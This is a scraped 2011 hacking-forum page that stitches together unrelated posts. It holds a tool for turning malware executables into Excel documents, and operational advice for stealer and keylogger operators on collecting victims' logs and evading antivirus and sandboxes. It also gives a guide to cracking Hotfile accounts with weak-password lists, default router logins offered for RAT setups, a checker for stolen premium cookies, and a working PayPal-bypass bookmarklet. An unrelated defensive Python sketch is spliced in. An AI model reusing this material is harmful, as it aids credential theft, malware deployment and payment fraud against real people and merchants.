* You can install it from an existing OS, but I recommend a clean installation.
- Make sure you've selected your DVD-ROM/RW drive as the first boot device (BIOS setup)*.
* If you don't know how to do that, check this link
- The text message "Press any key to boot from CD or DVD...." will appear.
* By pressing a key you enter the setup.
- Select your language, time and currency, and keyboard input (optionally).
- Click "Install now".
- Choose your edition* (x86 is 32-bit, x64 is 64-bit) depending on the CPU type you have.
* Note that if you have less than 4GB of RAM, x64 will be useless.
- Click "I accept".
- Click "Custom (advanced)".
- Choose the partition/HDD drive where Win7 should be installed and click format.
* Setup will continue automatically and will finish after 15-30 min.
- The next step will be the username (Image 17).
- Type your password (if you want).
- Choose the third option for the next step.
- Select your time zone.
- Select your current location.
- And the last step will be silent auto-activation*.
* Your PC will restart for the last time.

And that is all for the installation. You're in Win.



Hf & Fs & Fsc & Mu & Df Cookies Checker program

This program was programmed by me using the C# language.

Its function is to check (hotfile & fileserve & megaupload & filesonic & depositfiles) cookies, whether they are premium or not.

[Image: 92043980.png]

[Image: 87555372.png]

Note:
fileserve (short): it is the "PHPSESSID"
fileserve (long): it is the "cookie"

To check cookies:
1) Copy the cookies.
2) Press "add" or "past from clipboard" to add the cookies.
3) Choose "hotfile" or "fileserve" or "megaupload" or ...
4) Press start.
5) The "start" button will change to "stop"; wait until it changes to "start" again, and the working cookies will be placed in the textbox (the large one).

Note:
- You can use "past-start" to skip steps 2 & 4.
- This program isn't adware or spyware.
- File size is 15 Kb only (very simple program).



Windows Xp Doosha [Best look For You Windows]



CCleaner 2.3.1
K-Lite Mega codec pack 5.9.5
AIMP2 mp3 player 2
Winrar Corporat 9.3
Internet Download Manager 5.19.2
Mozilla Firefox 3.6













EXE to Xls Exploit [ms office exploit]

EXE to Xls Exploit [ms office exploit] Tutorial by: -Mr.MindfReak™

[Image: 19370769.png]
This exploit will convert your malware {bot}, i.e. any exe file, to .Xls {office document}.

Before you attempt to use this Exploit Make Sure you have "Perl" Installed

Usage:-Watch Video in Full Screen for HQ..

The converted output file, i.e. the .Xls document, will not be FUD, but you can hex it to make it FUD {not so easy though}.

Password is:- darkhk3r

20 reasons: Why people don't receive logs via stealer or KeyLogger

Many of you might have tried many stealers and keyloggers to get logs of your victims.
You might have registered on various FTP, PHP sites or even emails to test and get logs of your victims.
I have seen many people complaining about stealers or crypters and KL's. So, this thread may be the right solution/place for you.
Well, if you are not getting logs that doesn't mean stealer or KL is not good or hosting site is bad.
KL = keylogger
There are various reasons why people don't receive logs many times.
I will discuss some of the reasons, which I know. If you know more than these, please feel free to post.
Also, if at some point, I am wrong, please correct me.

Reason 1:
You might have entered wrong FTP, PHP info. This is because many people don't know how to put right PHP or FTP info into stealer or KL.

Reason 2:
Maybe your firewall is blocking access to your file.
If your target has powerful firewall (like ZoneAlarm, Outpost etc...), then it WILL suspect some suspicious behavior and pop-up Internet access privilege. If your target is smart enough, then he/she may block access to your file.

Reason 3:
You never know who is downloading your file (EXE). If the user is capable enough to ollydbg your file, he may easily get your FTP info (if file is not hardly crypted). If the user is smart enough, he may VMWare or Sandbox ur file and may delete ur file after seeing such external access info.

Reason 4:
Many stealers or KLs use UDP connection instead of TCP, for example Stealer2600.
UDP is very much unreliable as compared to TCP. So, UDP doesn't provide error checksum or resending of data. If ur stealer or KL is using TCP connection, then its much better.

Reason 5:
Sometimes it may happen that FTP or PHP host is down for some reasons (like backup or upgradation etc...). At that time, ur stealer will send info to the host, but as the host is down, u won't get logs.

Reason 6:
If your stealer or KL is FUD, say today on 7th Aug. It may become detected on 8th or 10th of August. You may never know. So, it won't be FUD anymore and AV's will delete it or may be FW will block access to your file.

Reason 7:
If your target has powerful AV's like Kaspersky, Avast, Nod etc..., they have Heuristic scanning. This may also prevent file from opening.
If ur exe is anti-Kaspersky or such like that, then well and good.

Reason 8:
Make sure your EXE is FUD and with many Anti-methods like anti-anubis, anti-sandbox, anti-VMWare, anti-debugger, anti-emulator, anti-sunbelt etc... (There are hell lot of anti-methods, i just explained a few)...
If ur exe is not anti with any of the above methods, then it may get detected, even by a n00b :P

Reason 9:
Sometimes, while stealer is sending logs 2 ur FTP or PHP, some packets may get lost while traveling to ur host. This is because of many reasons, like network congestion or bottleneck problems, etc...

Reason 10:
Sometimes, your host gets too busy and might come under very much pressure. So, it may stop responding and may not collect logs.

Reason 11:
Once you have distributed ur EXE and if ur using FTP acc to get logs, and then if u change pass of ur FTP acc, then also ur exe will not send logs.
This is coz, suppose say, ur ftp login info is username: "hello" and password is: "123456". This info is stored in ur exe and u distributed that. While uploading, ur exe will use the above info to upload logs 2 ur FTP.
If u change the password to "456789", then u know that u hv changed the password of ur FTP acc, but ur EXE doesn't know this. It will use the password as "123456". So, in this case also u won't receive logs.

Reason 12:
Your Stealer or keylogger is a man-made software. It also requires maintenance and upgradation. Over a period of time, its performance may decrease. This is also the reason of not receiving logs. But this happens very rarely, only if ur sticked 2 the same stealer for 2 years or more.

Reason 13:
Next reason is may be your crypter/binder/packer. If ur crypter does not support the stealer or KL which ur using, then it may corrupt ur exe.
So, choose the stealer and crypter combination wisely.

Reason 14:
Another reason is an operating system. Suppose say, ur stealer or KL is configured to run on XP SP1, SP2, SP3, NT, 2k and Vista.
If ur customers is using Windows 7, then obviously ur exe will not run on his PC as it can't understand how to execute.

Reason 15:
Another reason cud be 32-bit and 64-bit. If stealer or KL is configured 2 run only on 32-bit machines, then on 64-bit machines, it may not work, even if ur using XP and stealer is compatible with XP.

Reason 16:
If you dun hv good crypter and if ur FUDing ur file manually via Hexing, then make sure that u know proper hexing. Dun just go on google or on some forums and find hexing solution on FUDing ur file. You WILL corrupt ur EXE if ur dun understand offset and other terms...
Using tutorial on hexing is a good choice but dun apply ur own logic with that hex tut if u dunno hexing.
Also, dun combine one hex tutorial with another hex tutorial.
This will definitely corrupt ur file. Hahaha, lmao......

Reason 17:
If ur customer doesn't hv stored passwords in his browser, then also stealer will not send logs or it will send empty logs.

Reason 18:
Say, ur customer is using Google chrome and storing passwords in it. If ur stealer is not configured 2 steal passwords from chrome, then also u won't receive logs.
So, choose a stealer which have good combination of browser (FF, IE, etc...)

Reason 19:
Suppose ur EXE is FUD and is less than 20MB and if ur customers scans ur EXE under virustotal, or jotti, then ur EXE will get detected by many AV's and within few days, it will get detected easily and AV' will delete it.

Reason 20:
Even if ur EXE is 0/24 (FUD) on NVT, but if ur victims scans ur exe under Anubis, then mostly Anubis will show all the info after executing ur exe. This may alert ur customer and he may delete ur file.

These are the reason which I know, why people don't receive logs. If you know more than these, please post.


Cracking Hotfile Accounts

Cracking Hotfile Accounts [Mr.MindfReak]
1st download the Hotfile AIO Cracker v1.0
Virus scan if ya paranoid:

This is a simple cracker to use and you do not even need to deal with using proxies, and there are 2 ways to go about this

1. Load a list of usernames before anything, most common words are registered usernames, but if you're lazy here's a list of usernames you can use

2. Now for passwords you can either
A - load a small password list of around 50-100 passwords (you don't need any more than this as most hotfiles have very weak common passwords)
B - You can set the cracker to do username as the password (a lot of hotfile accounts have their password as their username) this is in the Extra Options tab

3. Set the sockets to 30, and the timeout to 9000.

4. Hit start and you're good to go. Cracked accounts will start showing up as they are hit. I have selected the option to run the username as the password in this screen shot and cracked quite a few accounts in the 1st minute
[Image: hotfile.jpg]

Now the only thing is checking every account to see if they are premium or not. If you want just crack premium accounts, you can select the option but you will need proxies for this. The nice thing is that the cracker has a built in proxy checker so it will check and save the good proxies for you.
Here's some proxies if you want to run it with em.


How to run your own private chat server

How to run your own private chat server. NO CONFIGURATION NEEDED!
You will need:
HachaT Server
HachaT IM Client
Both can be found here:

From here on out it will be VERY simple!!

Step 1: Extract contents of both files.

Step 2: Start your HachaT Server and Client programs.

Step 3 (a little bit harder):
Goto and make an account.
Login and click the "Hosts/Redirects" tab.
Click "Add New" on the menu bar to the left.
Change the host name to what you want and don't change anything else.
Click "Create Host".
Now goto
Download and Install the No-IP Client.
Log into your No-IP client and click "Select Hosts".
Make sure that your host is checked.
Click File;Preferences; and make sure "Run on Start up" is also checked.
Now click refresh on the main client page.

Step 4 (only for people on routers): Port forward to port 2323 using this tutorial as a guide:

Step 5: Type your host link (like this '' leaving out http://) and a nickname. Then click Connect.

Step 6: Share HachaT with your friends and tell them your server info!


How To Port Forward (Router & Modem Style)

What Is Portforwarding?

Port forwarding is necessary for using different tools, such as RATs and uTorrent and so on. Please follow this guide on How To Port Forward and you'll have your port forwarded :)!

Today I'll teach you how to port forward through the router & modem. (Not with PFConfig :) )

Lets Start!

Start off by going to: Start -> Run -> CMD -> And Type IPCONFIG
[Image: FASDASD.png]

Now Copy That "Standard Gateway // Default Gateway" IP And Type It Into Your Webbrowser & Log in.
[Image: IP_2.png]

My username is Root - nothing. The router // modem accounts usually are these:

Admin -
Admin - Admin
Admin - Password
Admin - User
Admin - Root
Admin - Custom Password, Check underneath your router for it! ;)

Root - Admin
Root -
Root - Password
Root - Root
Root - Password
Root - Custom Password. Check underneath ;)

User - Root
User -
User - Admin
User - Password
User - User
User - Custom Pass.

And so on.

Once you're logged in, Go to the "port forwarding" or in this case, "Virtual Server"

[Image: Ip_3.png]

[Image: DASDSAD.png]

Virtual Server: Enable / Disable.
Local IP: Found In IPConfig, As IP Address.
Start Port: The Port You Want To Forward, Start Port.
End Port: The Port You Want To Forward, End Port.
Protocol: TCP & UDP or BOTH
Remark: The Name Of The Wished Forwarded Program.

And When You've Saved The Settings, Go To And Type Your Port In There, And If It Says

[Image: Ip_5.png]

Then You've Succeeded With Your Port Forwarding.

If It Says

[Image: Ip_6.png]

You've Failed. Then I Advise You To Take A Look At And Look For Your Router Or Modem, Once You Find It They Have A Port Forward Tutorial There.


HachaT IM by eL3ET

[Image: Client-and-server.jpg]

The time has finally come for me to release HachaT (pronounced Hack Chat), and HachaT Server.
HachaT is a free software alternative to MSN and Yahoo. You can run your own server free of registration, setup or anything like that; just double click and your server is up and running (if you are on a router, port forward port 2323). To use the HachaT client, just type in a nickname and the server IP you're trying to connect to.

Like I said this software is completely free and released under the GPL license! Have fun talking to your friends!

HachaT Client Download 

HachaT Server Download


Bypass Paypal payment to get some ebooks and scripts for free

Just add the following in bookmark, or copy/paste it.
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

When you are visiting a page that uses a PayPal button, just click the bookmark or paste the code into the URL bar of your browser.

If it works, you will be redirected to the download page.
Else, try another site (or buy it).

It works with :
Chrome [X]
Firefox [X]
IE [?] (anyone can test it?)
Opera [X]
Safari [X]

A link the script works on :
If you find another link, please share
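
Why the bookmarklet works, shown as an added example (not code from the original post or from any payment provider): the checkout form's hidden `return` field is visible to the visitor before any payment, so a merchant who puts the download URL there has published it. The sketch contrasts that form with one whose download handler accepts only a signed, expiring token minted after the payment was verified server-to-server; the shop URL, secret, order IDs and function names are all assumptions constructed for illustration.

```python
import hashlib
import hmac
import time

# Assumption: a server-side secret (constructed value, never sent to the browser).
SECRET = b"constructed-demo-secret-rotate-me"
TOKEN_TTL = 900  # seconds a download link stays valid

# Assumption: orders confirmed as paid through the processor's server-to-server
# notification, never through the browser's redirect to the return URL.
PAID_ORDERS = set()


def weak_checkout_form(item_id):
    """'Before': the hidden return field is the download URL itself."""
    return {"item_number": item_id,
            "return": f"https://shop.example/downloads/{item_id}.zip"}


def hardened_checkout_form(item_id, order_id):
    """'After': return only points at an order status page."""
    return {"item_number": item_id, "custom": order_id,
            "return": f"https://shop.example/order/{order_id}/status"}


def record_verified_payment(order_id):
    """Call only after the payment notification was validated with the processor."""
    PAID_ORDERS.add(order_id)


def _sign(order_id, item_id, expires):
    msg = f"{order_id}|{item_id}|{expires}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def issue_download_token(order_id, item_id, now=None):
    """Mint a token for a paid order; returns None for unpaid orders.

    IDs are assumed not to contain '.', which separates the token fields.
    """
    if order_id not in PAID_ORDERS:
        return None
    expires = int(now if now is not None else time.time()) + TOKEN_TTL
    return f"{order_id}.{item_id}.{expires}.{_sign(order_id, item_id, expires)}"


def authorize_download(token, item_id, now=None):
    """Download handler check: signature, item, expiry and paid status."""
    try:
        order_id, tok_item, expires_s, sig = token.split(".")
        expires = int(expires_s)
    except (AttributeError, ValueError):
        return False  # missing or malformed token
    expected = _sign(order_id, tok_item, expires)
    # Constant-time comparison on bytes, so odd input cannot raise or leak timing.
    if not hmac.compare_digest(sig.encode(), expected.encode()):
        return False
    current = int(now if now is not None else time.time())
    return tok_item == item_id and current <= expires and order_id in PAID_ORDERS
```

With the hardened form, reading the `return` field yields only a status page, and the download handler rejects any request that lacks a valid token for a paid order.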



© 2011 Learn Cyber Security All Rights Reserved Learn Hacking Online